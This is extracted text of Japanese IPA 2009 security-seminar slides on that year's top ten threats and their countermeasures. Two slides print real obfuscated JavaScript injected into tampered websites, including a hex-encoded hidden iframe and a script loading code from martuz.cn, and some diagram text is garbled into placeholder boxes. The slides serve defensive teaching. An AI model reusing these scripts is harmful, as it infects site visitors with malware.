• 検索結果がありません。

2009 年度 IPA 情報セキュリティセミナー 技術コース標準編 本テキストの pdf ファイルは よりダウンロードできます Copyright 2009 独立行政法人情報

N/A
N/A
Protected

Academic year: 2021

シェア "2009 年度 IPA 情報セキュリティセミナー 技術コース標準編 本テキストの pdf ファイルは よりダウンロードできます Copyright 2009 独立行政法人情報"

Copied!
95
0
0

読み込み中.... (全文を見る)

全文

(1)

2009年度IPA情報セキュリティセミナー

技術コース標準編

本テキストのpdfファイルは

http://www.ipa.go.jp/security/event/2009/isec-semi/kaisai.html

(2)

技術コース 標準編について

主な対象

企業における情報セキュリティ脅威、および技術

面からの対策に関して理解を深めたい方

概要

セキュリティ事故防止の視点から、最近の重大

な情報セキュリティ脅威の動向と事例を紹介

しつつ、それぞれの技術的対策のポイントに

ついて解説

(3)

技術コース 標準編の内容

1. 情報セキュリティ10大脅威

2. 脆弱性関連情報の届出状況

3. 不正アクセスの届出状況

(4)

1.情報セキュリティ10大脅威

(5)

目次

1.1 情報セキュリティ10大脅威とは

(6)

1.1 情報セキュリティ10大脅威とは

2008年にIPAへ届けられたウイルス・不正

アクセス・脆弱性に関する情報や、一般に

公開された情報を、「情報セキュリティ検討

会」で精査

社会的影響の大きさから情報セキュリティ上の

“10大脅威”を選考

「組織」「利用者」「システム管理者・開発者」に

カテゴリ分類し脅威を分析、今後の対策を記述

次の URL からダウンロードできます。

http://www.ipa.go.jp/security/vuln/10threats2009.html

(7)

1.2 情報セキュリティ10大脅威の解説

組織への脅威

【1 位】 DNSキャッシュポイズニングの脅威

【2 位】巧妙化する標的型攻撃

【3 位】恒常化する情報漏えい

利用者への脅威

【1 位】多様化するウイルスやボットの感染経路

【2 位】脆弱な無線LAN暗号方式における脅威

【3 位】減らないスパムメール

【4 位】ユーザ ID とパスワードの使いまわしによる危険性

システム管理者・開発者への脅威

【1 位】正規のウェブサイトを経由した攻撃の猛威

【2 位】誘導型攻撃の顕在化

攻撃手法の「多様化」が進む

(8)

組織への脅威

【1位】 DNSキャッシュポイズニングの脅威

DNS キャッシュポイズニング

DNSサーバの情報が偽の情報に書き

換えられると、正しいメールアドレスを

指定しても、偽のメールサーバに誘

導されてしまう。ウェブページの場合

は偽のウェブサーバに誘導されてしま

う。

example.jp

example.jp

攻撃者

本来の

example.jp

偽の example.jp

一般利用者

foo@example.jp

example.jpの

IPアドレスを改ざん

(9)

組織への脅威

【1位】 DNSキャッシュポイズニングの脅威

DNS

(Domain Name System)

とは

インターネットにおけるホスト名とIPアドレスとを対応させるシステム

例えばwww.ipa.go.jp(ホスト名)と202.229.63.242(IPアドレス)とを

結び付ける情報を提供する仕組み

DNSキャッシュ機能

DNSはIPアドレスやDNSサーバ名を毎回問合せていると非効率

ゆえ、一度問合せた内容を再利用するキャッシュ機能がある

この機能を提供しているのがDNSキャッシュサーバである

DNSキャッシュポイズニングとは

キャッシュ機能を悪用し、偽データをキャッシュに記憶させる攻撃。

これによりドメイン名の乗っ取りやフィッシングなどが行なわれる

(10)

組織への脅威

【1位】 DNSキャッシュポイズニングの脅威

DNSキャッシュポイズニングの仕組み

DNSは主要な通信プロトコルとしてUDPを使用

UDPはTCPに比べ

通信データの偽造が容易

であるという短所がある

悪意を持った第三者が、DNSキャッシュサーバに問合せを行い、それ

を解決するDNSコンテンツサーバからの応答の前に、

① 送信元のIPアドレスをDNSコンテンツサーバに偽装し、

② 問合せに使われたUDPポートと同じポートに、

③ 問合せに使われたIDと同じIDをつけ、

④ DNSコンテンツサーバの応答よりも先に応答を返す

このことが出来た場合、 DNSキャッシュサーバはその応答が偽データ

であることを識別できないため、DNSキャッシュポイズニングが成立

してしまう

成功する可能性

DNSキャッシュポイズニングが成功する可能性は、キャッシュされた

データの有効時間(TTL:Time To Live)の設定値に依存し、 DNSコン

テンツサーバがその

有効時間を長くする

ことで、ある程度

軽減できた

(11)

組織への脅威

【1位】 DNSキャッシュポイズニングの脅威

カミンスキー・アタック

2008年7月 Dan Kaminsky 氏が

新たな攻撃手法

を発見し、

効率的

DNSキャッシュポイズニングを実行することが可能となった

これにより従来に比べ

危険性が急激に高まり

DNSキャッシュポイズ

ニングの脆弱性が大きな問題となった

被害例

米国のISP

が運営するDNSサーバが攻撃を受け、そのDNSサーバを

利用しているISP利用者が広告サイトに誘導されたうえに課金されると

いう、直接的な被害が発生した

中国大手ISP

では、攻撃者サイトに誘導されRealPlayer・FlashPlayer

などの脆弱性を利用したiFrame攻撃が行われマルウェア感染すると

いうタチの悪い被害が発生した

日本国内では、

日本を代表する大手企業

が、DNSキャッシュポイズ

ニング攻撃を受けている

(12)

組織への脅威

【1位】 DNSキャッシュポイズニングの脅威

各ベンダから公表されている対策は、あくまで暫定的

な対策

IPA: DNSキャッシュポイズニング対策

http://www.ipa.go.jp/security/vuln/DNS_security.html

根本的な対策方法は、インターネット関連技術の

標準化を進めるIETF(Internet Engineering Task

Force)などで議論されている

システム管理者は本問題の被害を軽減するため、

DNS関連ソフトウェアを対策版

へバージョンアップを

した上で、ファイアウォールやDNSの設定による対策

を行う

(13)

組織への脅威

【2位】巧妙化する標的型攻撃

標的型攻撃の事例

From

●● 広報 <press@example.jp>

題名

●●からのプレスリリースのお知らせ

プレスリリース(詳細) (72kb)

▼▼▼社 営業部各位。

お世話になっております。●●の■■です。

日頃より●●をご愛顧頂きありがとうございます。

●●はX月X日に、新商品として次の製品をリリースいたしました。

詳しくは、添付のファイルをご覧下さい。

・△ △ △ △ △ △

・◇ ◇ ◇ ◇ ◇ ◇

発信元を信頼ある

組織に偽装

実際の組織の

ウェブページの公表

内容等を元に偽装

攻撃の例

メールソフトウェア

(14)

組織への脅威

【2位】巧妙化する標的型攻撃

対象を

特定の組織や人

に限定した攻撃

ソーシャル・エンジニアリング

の手口により、

攻撃であることに気づきにくいことが最大の

脅威

信頼ある取引先や人物からのメールとして差出人を

偽装されている

信ぴょう性の高い内容

メールに

添付されている文書ファイル

や圧縮

ファイルには、

脆弱性を悪用するウイルス

仕込まれていることがある

(15)

組織への脅威

【2位】巧妙化する標的型攻撃

標的型攻撃の特徴

⑦情報窃取

無差別型攻撃 攻撃手法と対策の難しさ 標的型攻撃

(16)

感染予防策

利用者のOS、アプリケーションソフトを常に最新の

状態にさせておく

ウイルス対策ソフトのウイルス定義ファイルを

常に最新に維持し、定期的にスキャンを実施

標的型攻撃に関する情報収集と組織内への

周知徹底

組織への脅威

【2位】巧妙化する標的型攻撃

二次被害の防止策

不要な外向け

TCPポートを閉じる

HTTP/HTTPSアクセスを

プロキシサーバ経由に

限定する

(17)

組織への脅威

【3位】恒常化する情報漏えい

メール等の誤送信

記録媒体等の紛失・盗難

内部不正行為

ウイルス・ワーム

情報漏えいの様々な原因

ファイル交換ソフト

紙媒体の紛失・盗難

(18)

組織への脅威

【3位】恒常化する情報漏えい

出典:NPO日本ネットワークセキュリティ協会 - 「2008年情報セキュリティインシデントに関する調査報告書」

http://www.jnsa.org/result/2008/surv/incident/

42万人

155万人

1044万人

881万人

2224万人

3053万人

723万人

63件

57件

366件

1032件

993件

864件

1373件

0

200

400

600

800

1000

1200

1400

1600

0

500

1000

1500

2000

2500

3000

3500

2002年

2003年

2004年

2005年

2006年

2007年

2008年

情報漏えい事件数と

漏えい人数の推移

事件数

漏えい人数

(19)

流出した情報は回収できない!

組織への脅威

(20)

漏洩させない為の

ルール

作り

従業員の意識向上がキモ

組織への脅威

【3位】恒常化する情報漏えい

情報資産への

アクセス制限および管理

「いつ」、「誰が」、「どの権限」でアクセス

したかが調べられる仕組みも有効

情報を持ち出す場合には、「

暗号化

」が

必須条件

「

電子政府推奨暗号リスト」に掲載されている

暗号アルゴリズムを推奨

(21)

利用者への脅威

【1位】多様化するウイルスやボットの感染経路

ウイルス

自動実行

ファイル

外部メディア(USBメモリ等)でのコンピュータウイルス感染例

ウイルスに感染した

パソコンでUSBメモリ

を使用する。

USBメモリにウイルス

感染。ウイルスを自動

実行させるファイル作成。

他のパソコンでその

USBメモリを使用する

ことでそのパソコンも

ウイルスに感染する。

+

(22)

1日に数十万件

のメールを送る

ことも可能!

利用者への脅威

(23)

利用者への脅威

【1位】多様化するウイルスやボットの感染経路

USB メモリなど

の外部メディアを介する感染

オフラインパソコンへの感染や隔離ネットワーク内

でのウイルス拡散

ボット

」感染の罠を仕込まれたサイトの増加

SQLインジェクション攻撃やウイルスが原因との推測

ソフトウェアの脆弱性を利用した、電子文書の

ファイルフォーマットである

PDF

(Portable

Document Format)ファイルや

Microsoft

Officeファイル

(Word/Excel/PowerPoint)など

による感染

(24)

利用者への脅威

【2位】脆弱な無線LAN暗号方式における脅威

無線LANの暗号化の目的

•鍵を知っている利用者のみ

が無線LAN通信を利用する

ことが可能である。

•アクセスポイントまでの経路

で盗聴されない。

脆弱な無線LAN暗号方式

•脆弱な暗号方式を利用して

いる場合、無線LAN通信を

盗聴されることで、鍵を導出

される。

•鍵を導出されると、利用者の

無線LAN通信の内容を盗聴

されたり、アクセスポイントを

不正利用されたりする。

脆弱な暗号方式の無線LAN

(25)

利用者への脅威

【2位】脆弱な無線LAN暗号方式における脅威

2008年10月、無線LAN の暗号方式の規格の

一つであるWEP(Wired Equivalent Privacy)

が、一般的な環境下において極めて短い時間

内に解読可能であるという論文が発表された

(26)

通信の

暗号化は必須

 WEPは脆弱なので使用禁止!

WPA2

の利用を推奨(暗号化アルゴリズムは

AES

で)

利用者への脅威

【2位】脆弱な無線LAN暗号方式における脅威

パスワード

(ネットワークキー)設定に注意

 英語の辞書に載っている単語を使わない

 大文字、小文字、数字、記号の全てを含む文字列とする

 文字数は

最低でも20文字

(半角英数字+記号の場合。最大で63文字)

WPS

(Wi-Fi Protected Setup)などの設定容易化機能

を使うのも有効

接続可能

端末の認証

企業内利用であれば

IEEE802.1X

を推奨

(27)

利用者への脅威

【3位】減らないスパムメール

スパムメールをめぐる攻防のいろいろ

送信側

受信側

ブラック

リスト

コンテンツ

フィルタ

画像

文書

ファイル

送信ドメイ

ン認証

○○○.com =

OK!

△△△.com =

NG!

ホワイト

リスト

グレイ

リスト

ボットネット

差出人

偽装

OP25B

第三者

中継

統計的

フィルタ

(28)

【参考】OP25B(Outbound Port25 Blocking)の仕組み

ISP会員

ISPネットワーク網

メールサーバ

ISP

送信先

メールサーバ

外部の

メールサーバ

25

受信者

悪意あるユーザ

(送信側)

(送信側)

(受信側)

利用者への脅威

【3位】減らないスパムメール

(29)

【参考】 SPF(Sender Policy Framework)の仕組み

(a) 電子メールソフトから電子メールを送信する。

(b) メールサーバは送信先ドメインに対応するメールサーバへ配送する。

(c) 受信したメールサーバは、送信元のメールアドレスのドメイン(example.com)に

対しSPFリソースレコードを問い合わせる。

(d) 送信元のメールアドレスのドメイン(example.com)のDNS

*

サーバは、登録された

メールサーバのIPアドレスを回答する。

DNS

*

サーバ

メール

サーバ

メール

サーバ

(c)SPFリソースレコード

(a)

(b)

(d)

(e)

example.com

example.com に

偽装しても送れない

受信者

送信者

悪意あるユーザ

利用者への脅威

【3位】減らないスパムメール

(30)

システム管理者向け対策

スパムメール対策アプライアンスの利用

メールサーバが不正なメール中継可能な

設定になっていないかの定期的な確認

メールサーバのログ管理

(特にエラーメール)

利用者への脅威

【3位】減らないスパムメール

一般利用者向け対策

スパムメールフィルタや、プロバイダが提供する

フィルタリングサービスの利用

(31)

利用者への脅威

【4位】ユーザIDとパスワードの使いまわしによる危険性

ユーザ ID とパスワードの使い回しの脅威

○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ http://△△△.or.jp/ http://○○○.co.jp/

user

********

(32)

利用者への脅威

【4位】ユーザIDとパスワードの使いまわしによる危険性

やりがちな例

ウェブサイト間の使いまわし以外にも、OSのログオン時の

パスワードや、メールのパスワード、圧縮ファイルのパス

ワードなど、同一のパスワードを設定することがある

ウェブサイトAのユーザIDが、メールアドレスとして作成さ

れる場合において、ウェブサイトBでウェブサイトAのメール

アドレスをユーザIDとして登録した時に、同じパスワードを

利用していると、何らかの理由でウェブサイトBのパスワー

ドが漏れると、ウェブサイトAのパスワードが推測される

ウェブサイトB

abc@example.com ABCDEF

^^^

^^^^^

ウェブサイトA (example.com)

abc ABCDEF

^^^^^

^^^

^^^^^^^^^

(33)

利用者への脅威

【4位】ユーザIDとパスワードの使いまわしによる危険性

利用者

ユーザIDやパスワードを使いまわさず、別々に設定する

強いパスワード

(推測不可、辞書にない、適切な文字種文字数)

パスワード管理ソフトウェア

などを利用し管理する

関連性をもたせず管理できるならノートでの管理も良い

システム管理者

利用者のユーザIDやパスワードの利用方法について

注意を呼び掛ける

ウェブサイト開発者

ユーザのパスワードは平文のまま保存せず、

ハッシュ値

のみを保存

するように実装する。仮に不正アクセスを受け

データが漏えいしても、パスワードは持たぬため、被害を

(34)

システム管理者・開発者への脅威

【1位】正規のウェブサイトを経由した攻撃の猛威

正規ウェブサイトを改ざんして利用者が攻撃される

○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ http://△△△.or.jp/ http://▼▼▼.ne.jp/ http://○○○.co.jp/ ○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■

(35)

システム管理者・開発者への脅威

【1位】正規のウェブサイトを経由した攻撃の猛威

DB(データベース)と連携したウェブサイトが一般的となっている

一方、

SQLインジェクション対策が不十分

であるウェブサイトが

依然として減っていない

SQLインジェクション攻撃が

行われると・・

ウェブサイトで稼働している

DB内部の情報

盗まれたり

改ざん

されたり、

消去

されたりする

さらに踏み台としてウェブサイトを悪用されてしまう

またはウェブサイトの一部にウイルスを仕込むように改ざんさ

れ、その

ウェブサイトを閲覧したユーザをウイルスに感染

させ

る。このような改ざんは目には見えない手法で行われ、この攻

撃手法が主流となり被害が拡大している

これらの

攻撃を自動的に行うツール

がインターネット上で

(36)

システム管理者・開発者への脅威

【1位】正規のウェブサイトを経由した攻撃の猛威

<iframe src='http://url' width='1' height='1' style='visibility:

hidden;'></iframe><script>function

v4760be4c05e00(v4760be4c065f7){ function v4760be4c06def () {return 16;}

return(parseInt(v4760be4c065f7,v4760be4c06def()));}function

v4760be4c07de0(v4760be4c081dc){ var

v4760be4c085d9='';for(v4760be4c089d5=0;

v4760be4c089d5<v4760be4c081dc.length;

v4760be4c089d5+=2){ v4760be4c085d9+=(String.fromCharCode(v4760be4

c05e00(v4760be4c081dc.substr(v4760be4c089d5, 2))));}return

v4760be4c085d9;}

document.write(v4760be4c07de0('3C5343524950543E77696E646F772E73

74617475733D27446F6E65273B646F63756D656E742E777269746528273

C696672616D65206E616D653D3735393830313431207372633D5C276874

74703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746

D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292

A313632353235292B27663865656666625C272077696474683D353931206

865696768743D323735207374796C653D5C27646973706C61793A206E6F

6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

(37)

システム管理者・開発者への脅威

【1位】正規のウェブサイトを経由した攻撃の猛威

2009年4月に、SQLインジェクションが原因ではない、新たな改ざん手口が出現!

・悪意ある者が、FTPアクセスにより、改ざんウェブページをアップロード

Aさん(ウェブサイト管理者) 一般利用者 ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ 悪意ある者 悪意あるウェブサイト

ウェブサイト

管理者の

パソコンに

ウイルスが

侵入

ID:xxxx Pass:xxxx

ウイルスにより

ftp のアカウント

情報が悪意ある

者に送られる

改ざんされたAさんのウェブサイト

入手したftpアカウントを使って

Aさんのウェブサイトを改ざん

一般利用者が、改ざんされた

ウェブサイトを閲覧する

悪意あるウェブサイトに

誘導され、ウイルスを

ダウンロードさせられる

(38)

システム管理者・開発者への脅威

【1位】正規のウェブサイトを経由した攻撃の猛威

難読化スクリプト埋め込みに使われる様々な手法

<script

language=javascript><!--(function(){var

eaW='%'

;var

yvwNr

=(

'va-72-20-61-3d-22-53-63-72iptEngine-22-2cb-3d-22Ve-72-

73ion()-2b-22-2cj-3d-22-22-2cu-3dnavi-67ator-2euserAgent-3bif-28-28u-2e-69n-64e-78O-66(-22-43-

68ro-6de-22)-3c0)-26-26(-75-2eindexOf(-22Win-22)-3e0)-26-26(u-2eindexOf(-22NT-206-22-29-3c-30)-

26-26-28-64o-63u-6dent-2ec-6fokie-2e-69ndex-4ff-28-22-6d-69ek-3d-31-22)-3c0)-26-26-28-74-79pe-6ff-

28zrv-7a-74-73-29-21-3d-74yp-65-6ff(-22A-22-29))-7bzrvzts-3d-22A-22-3beva-6c(-22if-28w-69-6edow-

2e-22+a+-22-29j-3d-6a+-22+a+-22Major-22+b+a-2b-22Mi-6eor-22+b+a+-22Build-22+b+-22j-3b-22-29-

3bdocu-6d-65nt-2ew-72ite(-22-3c-73cript-20sr-63-3d-2f-2fma-72-22+-22tuz-2e-63-6e-2f-76id-2f-3f-69d-3d-22-2bj+-22-3e-3c-5c-2fs-63rip-74-3e-22)-3b-7d

').

replace(/-/g,eaW)

;eval(

unescape(yvwNr)

)})();

var

a=“ScriptEngine” ,b=“Version()+ ”,j=“” ,u=navigator.userAgent;

if((u.indexOf(“Chrome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”) <0) &&

(document.cookie.indexOf(“miek=1”) <0) && (typeof(zrvzts)!=

typeof(“A”))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");

document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+"><¥/script>")

;}

martuz.cn に飛ばされるようになっていた!

●replace操作 (

‘-’ を ‘%’に置換)

(39)

システム管理者・開発者への脅威

【2位】誘導型攻撃の顕在化

能動的

攻撃

•攻撃者は、直接サーバなどを攻撃する

•イントラネット内への攻撃は難しい

•攻撃される側の行動は不要で、いつでも攻撃可能

誘導型(受動的)

攻撃

•攻撃者は、利用者が特定の行動をとるよう

•FW で通信を許可している、ウェブやメール等を利用した攻撃

誘導する

•イントラネット内のシステムの攻撃に、よく用いられる

○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■

攻撃手法の対比

(40)

システム管理者・開発者への脅威

【2位】誘導型攻撃の顕在化

誘導手段

ネットサーフィン中の誘い込みによる誘導

○○○○○○○○ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■ ■■■■■■■■■■■ ■■■■■■ ○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■

知らぬ間に攻撃者のページに!

○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■

URL クリックで

添付ファイル(マルウェア)

スパムメールや標的型攻撃メールに記載されている

URLをクリックさせることによる誘導

スパムメールや標的型攻撃メールに添付されている

ウイルスファイルをクリックさせることによる誘導

バナー広告

からの誘導

検索エンジン

からの誘導

(41)

システム管理者・開発者への脅威

【2位】誘導型攻撃の顕在化

利用される脆弱性

脆弱なウェブサイト(クロスサイト・スクリプティングの

脆弱性)を利用

脆弱なソフトウェア製品(ウェブブラウザ、メールソフト、

圧縮解凍ソフトなど

引き起こされる脅威

偽り情報の参照

なりすましによる商品の購入

カード番号/パスワード/企業情報など、重要情報の

漏えい/改ざん/削除

(42)

システム管理者・開発者への脅威

【2位】誘導型攻撃の顕在化

ウェブサイトの脆弱性対策

新規開発:企画設計から運用を見据えたセキュリティ対策

組織内PCの保護

OS、ブラウザ、利用ソフトウェア製品の脆弱性解消

定期的なウェブアプリケーション検査および問題点解消

IDS/IPS や WAF の利用、リアルタイム監視

ウイルス対策ソフトのウイルス定義ファイルを常に最新に

維持し、定期的にスキャンを実施

ブラウザのセキュリティ設定を高めに

(通常はスクリプトを止める)

スパムメールフィルタの導入

URL フィルターの導入

(43)

システム管理者・開発者への脅威

【3位】組込み製品に潜む脆弱性

組込みアプリケーション

ハードウェア

デバイスドライバ

汎用ミドルウェア

汎用OS

組込み製品でもPCで

使用されているOSや

汎用ミドルウェアが

使用されるように

なってきた。

脆弱性

例えば組込み製品に

あるウェブ機能にお

いてPCと同様の脆弱

性が発見されている。

■クロスサイト・スクリプティング

■クロスサイト・リクエスト・

フォージェリ

など

組込み製品でもネッ

トワーク環境が整い、

PCと同じような脆弱

性が発見されている。

組込みアプリケーション

ハードウェア

デバイスドライバ

独自OS

独自ミドルウェア

(44)

システム管理者・開発者への脅威

【3位】組込み製品に潜む脆弱性

組込み製品の脆弱性

JVN(脆弱性対策情報ポータルサイト)で公表した組込み

機器に関連する脆弱性は 23 件。

脆弱性情報を公開した組込み製品のタイプ

セキュリティ製品、無線コントローラ、

ルータ(業務用ルータ、無線LANルータ)

プリンター、デジタル複合機、LAN接続型HDD、

ネットワークカメラサーバ、ネットワークカメラ、

ワイヤレスIP電話機、ハードディスクレコーダー

携帯端末、携帯電話

(45)

システム管理者・開発者への脅威

【3位】組込み製品に潜む脆弱性

ネットワーク利用が前提

多くの組込み製品は、

インターネット接続

による情報の利用

が一般的となってきている

専用から汎用へ

近年は組込み製品のOSやミドルウェアが

汎用化傾向

にある

複合的な脅威

インターネット接続可能な組込み製品の制御には、ウェブ

インターフェースの機能が用意されている事が多く、

ウェブ

アプリケーションとしての脆弱性が存在する

場合がある

脆弱性を攻撃されると、一般のコンピュータ同様に情報を

盗まれたり、改ざんされたり、消去されることになる

また遠隔で不正な操作が行われ組込み製品特有の被害

(46)

システム管理者・開発者への脅威

【3位】組込み製品に潜む脆弱性

システム管理者・一般利用者向け対策

組込み機器もパソコン同様に正しい管理と設定を行う

組込み機器の設定中に、他のブラウザやタブは開かない

作業が終了したらすぐに閉じる

罠サイト

悪意のある人

利用者

ソフト更新 パスワード ID ご利用のルータはソフト ウェアの更新が必要です。 別ウインドウでルータに ログインした後で、以下を クリックして下さい。 ソフト更新

① 罠サイトへ誘導

② ルータにログイン

③ ログイン完了

④ ソフト更新ボタン押下

設定変更

例えば、悪意ある通信を許可に!

⑤ 以降、コンピュータに不正侵入

【参考】CSRF(クロスサイト・リクエスト・フォージェリ)の攻撃例

ソフト更新

ウェブ管理画面にCSRFの

脆弱性を持ったルータ

(47)

システム管理者・開発者への脅威

【3位】組込み製品に潜む脆弱性

開発者(ベンダ)向け対策

組込み製品の開発プロジェクトでは、開発スケジュール

などが極めてタイトであったり、開発途中で要求仕様や

制約条件が変わる場合が多く発生する

組込み製品が扱う情報資産の価値に応じ、各ライフサイ

クル(企画、開発、運用、破棄)に対し適切なセキュリティ

対策を実施することが必要

万が一脆弱性が見つかった場合でも、利用者が分かり

やすく安全にアップデートできるための仕組みを用意する

IPA: 組込みシステムのセキュリティへの取組みガイド

http://www.ipa.go.jp/security/fy20/reports/emb_app/guide_fy20.pdf

(48)

10大脅威 対策が必要な対象者と総合順位

10大脅威

対策が必要な主な対象者

総合

順位

[白書2009]

前回

順位

[白書2008]

経営者

利用者

システム

管理者

開発者

■組織への脅威

1位

DNSキャッシュポイズニングの脅威

1位

2位

巧妙化する標的型攻撃

3位

4位

3位

恒常化する情報漏えい

5位

3位

■利用者への脅威

1位

多様化するウイルスやボットの感染経路

4位

6位

2位

脆弱な無線LAN暗号方式における脅威

6位

3位

減らないスパムメール

8位

9位

4位

ユーザIDとパスワードの使いまわしによる危険性

10位

■システム管理者・開発者への脅威

1位

正規のウェブサイトを経由した攻撃の猛威

2位

2位

2位

誘導型攻撃の顕在化

7位

1位

3位

組込み製品に潜む脆弱性

9位

10位

(49)

10大脅威 相関図

ボット利用者

( )

一般のユーザ ボット ボット ボット ボット ボット ボット 一般のユーザ ボット ボット ボット ボット ボット ボット ○○ ○○○○○ ○ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■ ○○ ○○○○○ ○ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■ ○○ ○○○○○ ○ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■■■■ ■■■■■ ■■ ■■■■ 22 ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ 當 и 慚 ○○○○ ○○○ ○ ■■■■ ■■■ ■■■ ■ ■■■■ ■■■ ■■■ ■■■■ ■■ ■■■■ ■■■ ■■■ ■■■■ ■■■ ■■■ ■■■■ ■■ 當 и 慚 ○○○○ ○○○ ○ ■■■■ ■■■ ■■■ ■■■■ ■■ ■■■■ ■■ ■■■■ ■■■ ■■ ■■■■ ■■■ ■■ ■■■■ ■■ 當 и 慚 ○○○○ ○○○ ○ ■■■■ ■■■ ■ ■■■■ ■■■ ■ ■■■■ ■■ ■■■■ ■■■ ■ ■■■■ ■■■ ■ ■■■■ ■■ 11 DNSキャッシュ ポイズニングの脅威 DNSサーバの 偽の情報で 誘導される [情報漏えい]へ 33 誘導型攻撃の種類 によっては直接情報 漏えいする場合も ○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ http://○○○.co.jp/ ○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ http://○○○.co.jp/ 11 攻撃 22 「誘導型」攻撃の顕在化 誘導型攻撃の多様な攻撃手法 多様化するウイルスや ボットの感染経路 22 脆弱な無線LAN暗号 巧妙化する標的型攻撃 33 攻撃にウイルスを利用 ユーザID/パスワード 使い回し user ********user ****** ** user ****** 44 11 スパムメール ボットをスパムメール 送付に利用 情報漏えい 33 組込み製品の脆弱性 33 ウイルスが 情報を盗む 脆弱な無線LAN暗 号方式により通信内 容を知られる 正規のウェブサイトを 経由した攻撃の猛威 漏えいしたユーザ情 報を利用して他サイ トにアクセス ユーザ情報を複数サ イトで使いまわすと更 なる被害の要因に 正規のウェブサイトを 攻撃されることで 情報漏えいする 44 112233 33 22 11 組織への脅威 112233 利用者への脅威 システム管理者開発者への脅威 [「誘導型」攻撃の 顕在化]へ 22

(50)

2.脆弱性関連情報の届出状況

(51)

目次

2.1 再確認:脆弱性って?

2.2 情報セキュリティ早期警戒

パートナーシップ

2.3 脆弱性関連情報の届出状況

2.4 SQLインジェクションとは?

2.5 クロスサイト・スクリプティングとは?

2.6 DNSキャッシュポイズニングとは?

2.7 脆弱性届出・対策に関する考察

(52)

2.1 再確認:脆弱性って?

脆弱性'ぜいじゃくせい(とは

 ソフトウエア製品やウェブアプリケーション等において、コンピュータ

不正アクセスやコンピュータウイルスなどの攻撃により、その

機能や

性能を損なう原因

となり得る

セキュリティ上の問題箇所

のこと

'出典:情報セキュリティ早期警戒パートナーシップガイドライン(

脆弱性を利用すると

 問題点箇所を巧みに利用し、コンピュータの内部データ'情報(を

盗んだり、書き換えたり、削除したり、また他のコンピュータへの

同様の悪事を働くことが可能となる

'これが

不正アクセス

であり、プログラム化して自動的に動作するの

ウイルス

ボット

である(

脆弱性対策は根本的なセキュリティ対策

 セキュリティ対策としてウイルスなどの対策も十分必要だが、脆弱性

を無くすことが最も重要!!

(53)

2.2

情報セキュリティ早期警戒パートナーシップ

'脆弱性関連情報の届出制度(

脆弱性情報を適切に流通させるために

 不適切な脆弱性の公開による問題は実際に発生しており、それを解決させる

ために2004年7月経済産業省告示

「ソフトウエア等脆弱性関連情報取扱基準」

が制定された。これを踏まえ、IPA・JPCERT/CCなど6団体から、脆弱性関連

